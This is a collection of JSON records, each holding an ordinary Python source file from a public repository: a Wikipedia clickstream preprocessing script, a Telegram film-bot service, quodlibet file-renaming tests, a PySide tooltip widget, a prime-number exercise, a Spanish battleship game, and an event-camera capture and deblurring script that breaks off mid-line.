+{"seq_id":"70686837493","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\nimport re\n\nfile = 'clickstream-enwiki-2020-01.tsv'\nfolder = '../Datasets/'\npath = folder+file\n\ndf = pd.read_csv(path, delimiter='\\t', \n encoding='utf-8', names=['referer', 'resource', 'path', 'count'])\n\n# get all external link click count for resource\ndf_external_count = df.groupby(['resource', 'path'])['count'].sum()\ndf_external_count = df_external_count.reset_index()\ndf_external_count = df_external_count.loc[df_external_count['path'] == 'external']\ndf_external_count['referer'] = 'other-external'\n\n# get all internal link click count for resource\ndf_internal = df.loc[df['path'] == 'link']\ndf_internal = df_internal.dropna()\n\n# combine them together\ndf_combined = pd.concat([df_internal, df_external_count], axis=0)\ndf_combined = df_combined.sort_values(by=['resource', 'path', 'count']).reset_index(drop=True)\n\nreg = re.compile(r'[^a-zA-Z0-9\\-\\_.]')\n\ndef preprocess(doc):\n rs = ''\n if(reg.search(doc) == None): \n rs = doc\n return rs\n\n# get english alphabets, numbers, -, and _ only\ndf_combined['resource'] = df_combined['resource'].apply(preprocess)\ndf_result = df_combined[df_combined['resource'].map(len) > 0]\n\n# get date from file name\ndate = file[-11:-4].replace('-', '')\ndf_result['date'] = date\n\n# reorder and rename the columns\ndf_result = df_result[['date', 'resource', 'referer', 'count']].rename(\n columns={'resource': 'title', 'referer': 'from'})\ndf_result = df_result.reset_index(drop=True)\n\n# Writing to CSV\ndf_result.to_csv('Results/clickstream-'+date+'.csv')\n\n# Saving to MySQL Format\n\n# from pandas.io import sql\n# import MySQLdb\n\n# con = MySQLdb.connect()\n# df_result.to_sql(con=con, name='clickstream-'+date, if_exists='replace', flavor='mysql')","repo_name":"atwong88/WikiPlugin","sub_path":"jenkins/jenkins-master/scripts/clickstream_to_sql.py","file_name":"clickstream_to_sql.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"42176443055","text":"import json\nimport logging\n\nimport requests\n\nfrom config import settings\nfrom serializers.film import film_serializer\n\n\nasync def retrieve_films(message):\n r = requests.get(url=f\"{settings.films_url}{message.from_user.id}\")\n films = r.text\n await film_serializer(films=json.loads(films), message=message)\n\n\nasync def retrieve_reviewed_films(message):\n url = settings.films_url\n user_id = message.from_user.id\n r = requests.get(url=f\"{url}{user_id}?parameter=viewed&query=True\")\n films = r.text\n await film_serializer(films=json.loads(films), message=message)\n\n\nasync def retrieve_unreviewed_films(message):\n url = settings.films_url\n user_id = message.from_user.id\n r = requests.get(url=f\"{url}{user_id}?parameter=viewed&query=False\")\n films = r.text\n await film_serializer(films=json.loads(films), message=message)\n\n\nasync def add_film(message, data):\n url = settings.films_url\n user_id = message.from_user.id\n data[\"user_id\"] = user_id\n r = requests.post(url=url, headers=settings.headers, data=json.dumps(data))\n logging.info(f\"{r.status_code}|{r.text}\")\n\n\nasync def delete(callback):\n user_id = callback.from_user.id\n name = callback.message.text.split(\":\")[1].split(\"\\n\")[0].lstrip()\n url = f\"{settings.films_url}{user_id}/{name}\"\n r = requests.delete(url=url, headers=settings.headers)\n return r.status_code\n\n\nasync def review(data, mark):\n user_id = data[0]\n mark = int(abs(mark))\n if mark > 10:\n mark = 10\n name = data[1].split(\":\")[1].split(\"\\n\")[0].lstrip()\n url = f\"{settings.films_url}{user_id}/{name}/{mark}\"\n r = requests.patch(url=url, headers=settings.headers)\n return r.status_code\n","repo_name":"berendovychRB/Bolvanka_telegram_bot","sub_path":"src/services/film.py","file_name":"film.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74991442291","text":"# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\nimport os\nimport glob\nfrom typing import Text\n\nfrom gi.repository import Gtk, GObject\n\nfrom tests import TestCase, mkdtemp\n\nfrom senf import fsnative\n\nfrom quodlibet import config\nfrom quodlibet.formats import AudioFile\nfrom quodlibet.qltk.renamefiles import (StripDiacriticals, StripNonASCII,\n Lowercase, SpacesToUnderscores,\n StripWindowsIncompat, RenameFiles,\n ReplaceColons)\n\n\nclass TFilter(TestCase):\n def setUp(self):\n self.c = self.Kind()\n\n def tearDown(self):\n self.c.destroy()\n\n\nclass TFilterMixin:\n\n def test_mix_empty(self):\n empty = fsnative(u\"\")\n v = self.c.filter(empty, u\"\")\n self.failUnlessEqual(v, u\"\")\n self.failUnless(isinstance(v, str))\n\n def test_mix_safe(self):\n empty = fsnative(u\"\")\n safe = u\"safe\"\n self.failUnlessEqual(self.c.filter(empty, safe), safe)\n\n\nclass TSpacesToUnderscores(TFilter, TFilterMixin):\n Kind = SpacesToUnderscores\n\n def test_conv(self):\n self.failUnlessEqual(self.c.filter(\"\", \"foo bar \"), \"foo_bar_\")\n\n\nclass TStripWindowsIncompat(TFilter, TFilterMixin):\n Kind = StripWindowsIncompat\n\n def test_conv(self):\n if os.name == \"nt\":\n self.failUnlessEqual(\n self.c.filter(u\"\", u'foo\\\\:*?;\"<>|/'), u\"foo\\\\_________\")\n else:\n self.failUnlessEqual(\n self.c.filter(\"\", 'foo\\\\:*?;\"<>|/'), \"foo_________/\")\n\n def test_type(self):\n empty = fsnative(u\"\")\n self.assertTrue(isinstance(self.c.filter(empty, empty), fsnative))\n\n def test_ends_with_dots_or_spaces(self):\n empty = fsnative(u\"\")\n v = self.c.filter(empty, fsnative(u\"foo. . \"))\n self.failUnlessEqual(v, fsnative(u\"foo. ._\"))\n self.assertTrue(isinstance(v, fsnative))\n\n if os.name == \"nt\":\n self.failUnlessEqual(\n self.c.filter(empty, u\"foo. \\\\bar .\"), u\"foo._\\\\bar _\")\n else:\n self.failUnlessEqual(\n self.c.filter(empty, u\"foo. /bar .\"), \"foo._/bar _\")\n\n\nclass TReplaceColons(TFilter, TFilterMixin):\n Kind = ReplaceColons\n\n def test_leaves_colons_without_space(self):\n assert self.unaffected(\"Nu:Tone & others - mix.flac\")\n assert self.unaffected(\"Elastica - 2:1.mp3\")\n\n def test_replaces_colons_as_delimiters(self):\n assert self.conv(\"ii: allegro\") == \"ii - allegro\"\n\n def test_replaces_semicolons_as_delimiters(self):\n assert (self.conv(\"Mozart; Requiem in D minor\")\n == \"Mozart - Requiem in D minor\")\n\n def test_replaces_colons_with_lots_of_spaces(self):\n assert (self.conv(\"Cello Suite No 1 : Prelude\")\n == self.conv(\"Cello Suite No 1 - Prelude\"))\n\n def test_replaces_colons_with_non_word(self):\n assert (self.conv('No. 1 \"Minute\": Molto vivace')\n == self.conv('No. 1 \"Minute\" - Molto vivace'))\n\n def test_type(self):\n empty = fsnative(u\"\")\n self.assertTrue(isinstance(self.c.filter(empty, empty), fsnative))\n\n def conv(self, s: Text):\n return self.c.filter(fsnative(\"\"), s)\n\n def unaffected(self, s: Text) -> bool:\n return self.conv(s) == s\n\n\nclass TStripDiacriticals(TFilter, TFilterMixin):\n Kind = StripDiacriticals\n\n def test_conv(self):\n empty = fsnative(u\"\")\n test = u\"\\u00c1 test\"\n out = u\"A test\"\n v = self.c.filter(empty, test)\n self.failUnlessEqual(v, out)\n self.failUnless(isinstance(v, str))\n\n\nclass TStripNonASCII(TFilter, TFilterMixin):\n Kind = StripNonASCII\n\n def test_conv(self):\n empty = fsnative(u\"\")\n in_ = u\"foo \\u00c1 \\u1234\"\n out = u\"foo _ _\"\n v = self.c.filter(empty, in_)\n self.failUnlessEqual(v, out)\n self.failUnless(isinstance(v, str))\n\n\nclass TLowercase(TFilter, TFilterMixin):\n Kind = Lowercase\n\n def test_conv(self):\n empty = fsnative(u\"\")\n\n v = self.c.filter(empty, fsnative(u\"foobar baz\"))\n self.failUnlessEqual(v, fsnative(u\"foobar baz\"))\n self.failUnless(isinstance(v, fsnative))\n\n v = self.c.filter(empty, fsnative(u\"Foobar.BAZ\"))\n self.failUnlessEqual(v, fsnative(u\"foobar.baz\"))\n self.failUnless(isinstance(v, fsnative))\n\n\nclass Renamer(Gtk.EventBox):\n __gsignals__ = {\n \"changed\": (GObject.SignalFlags.RUN_LAST, None, (object,)),\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__()\n\n from quodlibet.library import SongLibrary\n\n self.library = SongLibrary()\n box = Gtk.EventBox()\n self.renamer = RenameFiles(self.library, box)\n box.add(self.renamer)\n\n self.renamer.test_mode = True\n\n def add_songs(self, songs):\n self.library.add(songs)\n\n def rename(self, pattern, songs):\n self.renamer.combo.get_child().set_text(pattern)\n self.renamer._preview(songs)\n self.renamer._rename(self.library)\n\n\nclass Song(AudioFile):\n \"\"\"A mock AudioFile belong to one of three albums,\n based on a single number\"\"\"\n\n def __init__(self, target, num):\n super().__init__()\n\n self[\"title\"] = \"title_%d\" % (num + 1)\n self[\"artist\"] = \"artist\"\n self[\"album\"] = \"album\"\n self[\"labelid\"] = self[\"album\"]\n self[\"~filename\"] = \\\n fsnative(os.path.join(target, self[\"title\"] + \".mp3\"))\n\n\nclass TMoveArt(TestCase):\n Kind = Renamer\n\n def setUp(self):\n self.renamer = self.Kind()\n\n def tearDown(self):\n self.renamer.destroy()\n\n def reset_environment(self):\n config.init()\n self.root_path = mkdtemp()\n self.filenames = \\\n [\"cover.jpg\", \"info.jpg\", \"title.jpg\", \"title2.jpg\"]\n\n def generate_songs(self, path, quantity):\n return [Song(path, num) for num in range(quantity)]\n\n def generate_files(self, path, filenames):\n pathfiles = []\n for f in filenames:\n pathfile = os.path.join(path, f)\n if not os.path.isdir(os.path.dirname(pathfile)):\n os.makedirs(os.path.dirname(pathfile))\n with open(pathfile, \"w\") as fh:\n fh.write(f)\n pathfiles.append(pathfile)\n\n return pathfiles\n\n def art_set(self, path):\n return self.generate_files(path, self.filenames)\n\n def song_set(self, path):\n songs = self.generate_songs(path, 1)\n files = self.generate_files(path, [os.path.basename(song[\"~filename\"])\n for song in songs])\n return files, songs\n\n def source_target(self, root_path, album, artist):\n return (os.path.join(root_path, album, artist),\n os.path.join(root_path + \"_2\", album, artist))\n\n def moveart_set(self, artist=\"artist\", album=\"album\",\n source=None, target=None, file_pattern=\"\"):\n source2, target2 = \\\n self.source_target(self.root_path, artist, album)\n if not source:\n source = source2\n if not target:\n target = target2\n self.art_set(source)\n song_files, songs = self.song_set(source)\n self.renamer.add_songs(songs)\n pattern = os.path.join(target, file_pattern)\n self.renamer.rename(pattern, songs)\n return (source, target)\n\n def test_no_move(self):\n self.reset_environment()\n\n # move art not set, no art files should move\n count_expected = 0\n source, target = self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_move_defaults(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n\n # single match for default search_filenames\n # \"cover.jpg,folder.jpg,.folder.jpg\"\n count_expected = 1\n source, target = self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_move_all_wildcard(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \"*.jpg\")\n\n # wildcard added to search_filenames for catchall\"\n count_expected = 4\n source, target = self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_move_escape_glob_characters(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \"*.jpg\")\n self.filenames = [\"artist_[x].jpg\"]\n\n # test whether we cope with non-escaped special glob characters\"\n count_expected = 1\n source, target = self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_relative_pattern(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \"*.jpg\")\n\n # should be a no-op\"\n count_expected = 4\n source, target = self.moveart_set(target=\"\")\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_selective_pattern(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \".jpg\")\n self.filenames = [\"cover.jpg\", \"artist.jpg\"]\n\n # should be a no-op\n count_expected = 1\n source, target = self.moveart_set(target=\"\")\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_overwrite(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \"*.jpg\")\n self.filenames = [\"art.jpg\"]\n\n # move set\n source, target = self.moveart_set()\n # fail as target audio already exists\n self.assertRaises(Exception, self.moveart_set())\n\n # remove audio\n os.remove(os.path.join(target, \"title_1.mp3\"))\n\n # move exising target art to .orig suffix\n count_expected = 2\n self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*jpg*\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n # remove audio\n os.remove(os.path.join(target, \"title_1.mp3\"))\n os.remove(os.path.join(target, \"art.jpg.orig\"))\n config.set(\"rename\", \"move_art_overwrite\", True)\n\n # overwrite existing target arg\n count_expected = 1\n self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*jpg*\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_multi_source(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \"*.jpg\")\n\n source, target = \\\n self.source_target(self.root_path, \"artist\", \"album\")\n source2, target2 = \\\n self.source_target(self.root_path, \"artist\", \"album2\")\n\n self.filenames = [\"art.jpg\"]\n self.art_set(source)\n self.filenames = [\"art2.jpg\"]\n self.art_set(source2)\n\n song_files, songs = self.song_set(source)\n song_files2, songs2 = self.song_set(source2)\n\n self.renamer.add_songs(songs + songs2)\n\n # avoid audio file clashes\n pattern = os.path.join(target, \"[] artist - \")\n self.renamer.rename(pattern, songs + songs2)\n\n # album art sets merged\n count_expected = 2\n self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n","repo_name":"quodlibet/quodlibet","sub_path":"tests/test_qltk_renamefiles.py","file_name":"test_qltk_renamefiles.py","file_ext":"py","file_size_in_byte":12633,"program_lang":"python","lang":"en","doc_type":"code","stars":1306,"dataset":"github-code","pt":"21"}
+{"seq_id":"15101466634","text":"# coding: utf-8\nfrom PySide.QtCore import QEvent, QObject, Property, QPropertyAnimation, QEasingCurve\nfrom PySide.QtGui import QCursor, QGraphicsOpacityEffect\n\nfrom pyside_tooltip.positioning.bottomTooltipPositioning import BottomTooltipPositioning\nfrom pyside_tooltip.positioning.leftTooltipPositioning import LeftTooltipPositioning\nfrom pyside_tooltip.positioning.nullTooltipPositioning import NullTooltipPositioning\nfrom pyside_tooltip.positioning.rightTooltipPositioning import RightTooltipPositioning\nfrom pyside_tooltip.positioning.topTooltipPositioning import TopTooltipPositioning\n\n__author__ = 'Andres'\n\n\nclass Tooltip(QObject):\n\t# Positioning:\n\tLEFT_POSITIONING = LeftTooltipPositioning()\n\tTOP_POSITIONING = TopTooltipPositioning()\n\tRIGHT_POSITIONING = RightTooltipPositioning()\n\tBOTTOM_POSITIONING = BottomTooltipPositioning()\n\n\tNULL_POSITIONING = NullTooltipPositioning()\n\n\t# Tiempos de fade\n\tFADE_IN_TIME = 300\n\tFADE_OUT_TIME = 500\n\n\tdef __init__(self, hoverable_widget, positionings, main_window, gap=7):\n\t\tsuper(Tooltip, self).__init__()\n\n\t\tself._current_positioning = None\n\t\tself._tooltipContainer = None\n\n\t\tself._widget = None\n\t\tself._hoverable_widget = hoverable_widget\n\t\tself._mainWindow = main_window\n\t\tself._gap = gap\n\t\tself._positionings = positionings\n\t\tself._positionings.append([Tooltip.NULL_POSITIONING, None])\n\t\tself.isHoverable = True\n\n\t\tself._hoverable_widget.installEventFilter(self)\n\n\tdef gap(self):\n\t\treturn self._gap\n\n\tdef getWidget(self):\n\t\traise NotImplementedError(\"Subclass Responsibility\")\n\n\tdef widget(self):\n\t\treturn self._widget\n\n\tdef hoveredWidget(self):\n\t\treturn self._hoverable_widget\n\n\tdef positionings(self):\n\t\treturn self._positionings\n\n\tdef close(self):\n\t\tself._tooltipContainer.close()\n\t\tself._tooltipContainer = None\n\n\tdef closeTooltip(self):\n\t\tif self._tooltipContainer is not None:\n\t\t\tself._tooltipContainer.removeEventFilter(self)\n\t\t\topacity = self._getOpacity() + 0.01\n\t\t\tself._fade(opacity, 0.0, self.FADE_OUT_TIME * opacity)\n\t\t\tself.anim.finished.connect(self.close)\n\n\tdef _closeTooltipWithoutAnimation(self):\n\t\t\"\"\"\n\t\tNo superponer explicitamente animaciones.\n\t\tSi el tooltip se cierra y detras suyo se abre otra vista, usar este metodo.\n\t\t\"\"\"\n\t\tif self._tooltipContainer is not None:\n\t\t\tself.close()\n\n\tdef setHoverability(self):\n\t\tself.isHoverable = True\n\n\tdef _handleHoveredWidgetEnterEvent(self):\n\t\tif self._tooltipContainer is None:\n\t\t\tself._widget = self.getWidget()\n\t\t\tself._current_positioning = self._getBestPossiblePositioning()\n\t\t\tself._tooltipContainer = self._current_positioning[0].showTooltip(self, self._current_positioning[1], self._mainWindow)\n\t\t\tself._tooltipContainer.installEventFilter(self)\n\t\t\tself._fade(0.0, 1.0, self.FADE_IN_TIME)\n\t\telse:\n\t\t\topacity = self._getOpacity()\n\t\t\tself._fade(opacity, 1.0, self.FADE_IN_TIME * (1 - opacity))\n\t\t\tself._tooltipContainer.installEventFilter(self)\n\n\tdef _handleHoveredWidgetLeaveEvent(self):\n\t\tif not self.isHoverable:\n\t\t\tself._closeTooltipWithoutAnimation()\n\t\telif self._tooltipContainer is not None and not self._tooltipContainerUnderMouse():\n\t\t\tself.closeTooltip()\n\n\tdef _handleTooltipLeaveEvent(self):\n\t\ttry:\n\t\t\tif not self._hoveredWidgetUnderMouse():\n\t\t\t\tself.closeTooltip()\n\t\texcept RuntimeError:\n\t\t\tself.closeTooltip()\n\n\tdef _getBestPossiblePositioning(self):\n\t\treturn next(positioning for positioning in self._positionings\n\t\t\t\t\tif positioning[0].isPossibleFor(self._hoverable_widget, self, self._mainWindow))\n\n\tdef _tooltipContainerUnderMouse(self):\n\t\treturn self._tooltipContainer.rect().contains(self._tooltipContainer.mapFromGlobal(QCursor.pos()))\n\n\tdef _hoveredWidgetUnderMouse(self):\n\t\treturn self._hoverable_widget.rect().contains(self._hoverable_widget.mapFromGlobal(QCursor.pos()))\n\n\tdef eventFilter(self, obj, event):\n\t\tif obj is self._hoverable_widget:\n\t\t\tif event.type() is QEvent.Enter:\n\t\t\t\tself._handleHoveredWidgetEnterEvent()\n\t\t\telif event.type() is QEvent.Leave:\n\t\t\t\tself._handleHoveredWidgetLeaveEvent()\n\t\t\t\tself.setHoverability()\n\t\telif obj is self._tooltipContainer:\n\t\t\tif event.type() is QEvent.Leave:\n\t\t\t\tself._handleTooltipLeaveEvent()\n\t\treturn False\n\n\t# Aca viene la mierda del fade\n\n\tdef _getOpacity(self):\n\t\treturn self._tooltipContainer.graphicsEffect().opacity()\n\n\tdef _setOpacity(self, opacity):\n\t\tif self._tooltipContainer is not None:\n\t\t\teffect = QGraphicsOpacityEffect(self._tooltipContainer)\n\t\t\teffect.setOpacity(opacity)\n\t\t\tself._tooltipContainer.setGraphicsEffect(effect)\n\n\t_opacity_property = Property(type(0.0), _getOpacity, _setOpacity)\n\n\tdef _fade(self, start, end, duration):\n\t\teffect = QGraphicsOpacityEffect(self)\n\t\teffect.setOpacity(start)\n\t\tself._tooltipContainer.setGraphicsEffect(effect)\n\n\t\tself.anim = QPropertyAnimation(self, \"_opacity_property\")\n\t\tself.anim.setDuration(duration)\n\t\tself.anim.setStartValue(start)\n\t\tself.anim.setEndValue(end)\n\t\tself.anim.setEasingCurve(QEasingCurve.OutQuad)\n\t\tself.anim.start()\n","repo_name":"andimarafioti/pyside-tooltip","sub_path":"pyside_tooltip/Tooltip.py","file_name":"Tooltip.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"6549563886","text":"l = list()\nprime = list()\ncomposite = list()\nn = int(input(\"Enter the number of elements: \"))\ndef isPrime(n):\n if n > 1:\n for i in range(2, n//2 + 1):\n if (n % i) == 0:\n return False\n return True\n else:\n return False\n \nfor i in range(0, n):\n ele = int(input(f\"Enter element {i+1}:\"))\n l.append(ele)\n if isPrime(ele):\n prime.append(ele)\n else:\n composite.append(ele)\nprint(\"List: \", l)\nprint(\"Prime: \", prime)\nprint(\"Composite: \", composite)\n","repo_name":"Mayon-Francis/S6_Python_Elective","sub_path":"Assignment3/02_listPrimeComposite.py","file_name":"02_listPrimeComposite.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36689432252","text":"import numpy as np\nimport random\nimport variables as var\nimport funciones as f\nimport clases as c\nimport time\n\n# creamos dos objetos de tablero ,uno para la persona y otro para la maquina\nobjeto_persona = c.Tablero('persona', var.ancho, var.largo, var.barcos)\nobjeto_maquina = c.Tablero('maquina', var.ancho, var.largo, var.barcos)\n# el peimer turno es para la persona,y print un tablero con los barcos de la persona\n\nturno = 'persona'\nprint('Tus barcos:')\ntime.sleep(2)\nprint(objeto_persona.tablero_barcos)\n#ahora empiza el juego\nwhile True:\n # se pinta de quien es el turno\n print('Turno de: ' + turno)\n #si el turno es de la persona ,pintamos el tablero de la maquina,y pedimos la entrada de coordenadas\n if turno == 'persona':\n objeto_maquina.pintar()\n coordinadas_entrada = str(input(\"¿Dónde quieres disparar? Ejemplo: 1,1: \")).replace(\".\",\",\").split(',') #进入坐标返回的是一个列表\n \n # verifica si las coordenadas supera los limites o no, en caso de superar solicitamos nuevas coordenadas\n while int(coordinadas_entrada[0]) not in range(var.ancho) or int(coordinadas_entrada[1]) not in range(var.largo):\n print('Coordinada es invalida, introduce una nueva coordenada')\n coordinadas_entrada = str(input(\"¿Dónde quieres disparar? Ejemplo: 1,1: \")).replace(\".\",\",\").split(',')\n \n # verifica si esas coordenas hubo disparo o no, en caso de que si, solicitamos nuevas coordenadas. \n while objeto_maquina.tiene_disparo(int(coordinadas_entrada[0]), int(coordinadas_entrada[1])): \n print('Ya has disparado en esa coordenada, introduce una nueva coordenada')\n coordinadas_entrada = str(input(\"¿Dónde quieres disparar? Ejemplo: 1,1: \")).replace(\".\",\",\").split(',')\n \n # esta parte cuando se ha disparado al agua, retorna false y pasa el turno a la maquina \n if objeto_maquina.disparar(int(coordinadas_entrada[0]), int(coordinadas_entrada[1])) == False:\n turno = 'maquina'\n # se pinta finalmente el tablero de la maquina\n objeto_maquina.pintar()\n time.sleep(2)\n\n else: # en caso de que sea el turno de la maquina\n objeto_persona.pintar()# se pinta el tablero de la persona,y generar coordenadas aleatorias\n x = random.randint(0, var.ancho -1)\n y = random.randint(0, var.largo-1)\n\n # return self.tablero_disparos[x][y] == 'X' or self.tablero_disparos[x][y] == '-'\n # este while generará un nueva coordenada mientras la coordenada aleatoria ya tenga un disparo\n while objeto_persona.tiene_disparo(x, y):\n x = random.randint(0, var.ancho -1)\n y = random.randint(0, var.largo -1)\n #se dispara a la coordenada generada si devuelve false parasamos el turno a la persona\n if objeto_persona.disparar(x, y) == False:\n turno = 'persona'\n #se vuelve a pintar el tablero de disparos de la persona \n objeto_persona.pintar()\n\n # una vez if acaba, se comprueba la vida de la persona y la maquina ,sse comprueba la vida si alguno llega\n # a 0 ,y el otro gana y se rompe el bucle ,y se pinta fin\n if objeto_persona.vidas == 0:\n print('Ganador: maquina')\n break\n if objeto_maquina.vidas == 0:\n print('Ganador: persona')\n break\n\nprint('FIN')\n","repo_name":"qinghua03/hundir_la-_flota","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"13483560754","text":"import queue\nimport numpy as np\nimport cv2\nimport threading\nfrom copy import deepcopy\n\n# dv_processing@https://dv-processing.inivation.com/rel_1.7/installation.html\nimport dv_processing as dv\nimport argparse\nimport time\nimport datetime\nfrom PIL import Image\nfrom inference import davis346_inference\nfrom event_utils import hot_pixel_detect\nfrom DAVIS_event_abnormal_detect import Event_package_loss\n\nfrom model import EFNet\nfrom model import load_network\n\n\n## 采集DAVIS的子线程\nthread_lock = threading.Lock()\nthread_exit = False\ndeblur_waiting_flag = True\nexposure_time = 40 ##ms\nmodel = None\n\n\nclass DAVIS(threading.Thread):\n def __init__(self, img_height, img_width, cam):\n super(DAVIS, self).__init__()\n self.img_height = img_height\n self.img_width = img_width\n self.cam = cam\n # frame是一个常变的变量,deblur线程不会直接访问它。主线程会访问它,以显示DAVIS实时采集到的APS帧\n self.frame = np.zeros((img_height, img_width), dtype=np.uint8)\n self.event = None\n self.frame_timestamp = 0\n self.last_frame = np.zeros((img_height, img_width), dtype=np.uint8)\n self.last_frame_timestamp = 0\n # event_list用于存储一个较长时间段的事件序列\n self.event_list = None\n # deblur_events是event_list经过挑选后,符合送入deblur处理线程的事件序列\n self.deblur_events = None\n self.frame_enable = True\n self.exposure_start = 0\n self.exposure_end = 0\n self.debug_ts = 0\n\n self.acquire_flag = True\n\n\n def get_frame(self):\n return deepcopy(self.frame)\n\n def get_event(self):\n if self.event is not None:\n return self.event.numpy()\n\n def get_last_frame_timestamp(self):\n return self.last_frame_timestamp\n\n def get_last_frame(self):\n return deepcopy(self.last_frame)\n\n def get_event_list(self):\n return deepcopy(self.event_list)\n\n\n\n def get_deblur_events(self):\n if self.deblur_events is not None:\n return self.deblur_events\n else:\n return None\n\n def run(self):\n global thread_exit\n global deblur_waiting_flag\n while (not thread_exit and self.cam.isRunning()):\n # frame = cv2.resize(frame, (self.img_width, self.img_height))\n # 从设备buffer读取frame及event\n frame = self.cam.getNextFrame()\n\n events = self.cam.getNextEventBatch()\n\n thread_lock.acquire()\n if frame is not None:\n self.frame = frame.image\n self.frame_timestamp = frame.timestamp\n # time.sleep(1)\n\n if events is not None:\n self.event = events\n # event_bag=events.numpy().tolist()\n\n # deblur 用不到external trigger\n # if triggers is not None:\n # # self.trigger_list = triggers[0:-1]\n # #\n # # print(f\"Received imu data within time range [{triggers[0].timestamp}; {triggers[-1].timestamp}]\")\n # for i,trigger in enumerate(triggers):\n # # print(trigger.timestamp)\n # if trigger.type.name == 'APS_EXPOSURE_START':\n # self.exposure_start = trigger.timestamp\n # elif trigger.type.name == 'APS_EXPOSURE_END':\n # self.exposure_end = trigger.timestamp\n # # print(self.exposure_end-self.exposure_start)\n\n\n # 如果deblur线程空闲,\n if deblur_waiting_flag and (events is not None) and (frame is not None):\n # 将本次采集到的APS帧放入last_frame中\n if self.frame_enable:\n self.last_frame_timestamp = self.frame_timestamp\n self.last_frame = self.frame\n self.frame_enable = False\n\n\n if self.event_list is None:\n self.event_list = np.array([events.numpy().tolist()]).squeeze()\n else:\n input_events = np.array([events.numpy().tolist()]).squeeze()\n\n if self.debug_ts == 0:\n self.debug_ts = input_events[-1,0]\n else:\n #TODO :出现报错时候,把event_list清空\n # if input_events[0, 0] - self.debug_ts > 20*exposure_time*1e3:\n # print('lss')\n # # self.event_list = None\n # # self.deblur_events = None\n # self.frame_enable = True\n # # time.sleep(0.0001)\n # thread_lock.release()\n # continue\n\n self.debug_ts = input_events[-1,0]\n self.event_list = np.append(self.event_list, input_events, axis=0)\n #防止event_list中事件过多导致内存泄漏\n if self.event_list.shape[0] > 330e3*10:\n print('clear')\n self.event_list = self.event_list[-int(330e3*5):,:]\n # 如果当前存储的event_list中开始��件的时间戳落后于当前存储的APS帧图像的时间戳,说明事件曝光时间内的事件不完整,丢弃这一帧,事件依然保留\n # 6.1添加:如果经过20个曝光时间,last_frame依然没有推理时,重新采一张frame存储下来(跟上实时显示的效果)\n if self.last_frame_timestamp < self.event_list[0, 0] or self.frame_timestamp-self.last_frame_timestamp > exposure_time*1e3*20:\n # self.event_list = None #event_list不清空\n self.frame_enable = True #即在下一次进入该线程时把新获取到的一帧APS存储下来\n elif self.last_frame_timestamp + exposure_time * 1000 < self.event_list[-1, 0]:\n # 说明event_list已经包含last_frame曝光时间内的所有事件了\n # print('deblur ready')\n # start=time.time()\n\n # 把event_list里曝光时间内的事件挑出来\n low_index = np.argmin(np.abs(self.event_list[:, 0].squeeze() - self.last_frame_timestamp))\n high_index = np.argmin(\n np.abs(self.event_list[:, 0].squeeze() - self.last_frame_timestamp - exposure_time * 1000))\n self.deblur_events = self.event_list[low_index:high_index, :].squeeze()\n\n # deblur_waiting_flag = False指的是deblur线程可以开始进行deblur了\n deblur_waiting_flag = False\n self.event_list = self.event_list[high_index:, :].squeeze()\n # 可以将接下来的APS流中的帧存储下来了\n self.frame_enable = True\n # end = time.time()\n # print((end-start)*1000)\n thread_lock.release()\n\n\n# 处理画面的子线程\nclass RenderFrame(threading.Thread):\n def __init__(self, thread_name, raw_thread, img_height, img_width):\n threading.Thread.__init__(self, name=thread_name)\n self.raw_thread = raw_thread\n self.input_frame = np.zeros((img_height, img_width), dtype='uint8')\n self.event_frame = np.zeros((img_height, img_width, 3), dtype='float')\n self.deblur_frame = np.zeros((img_height, img_width), dtype='uint8')\n self.input_frame_2 = 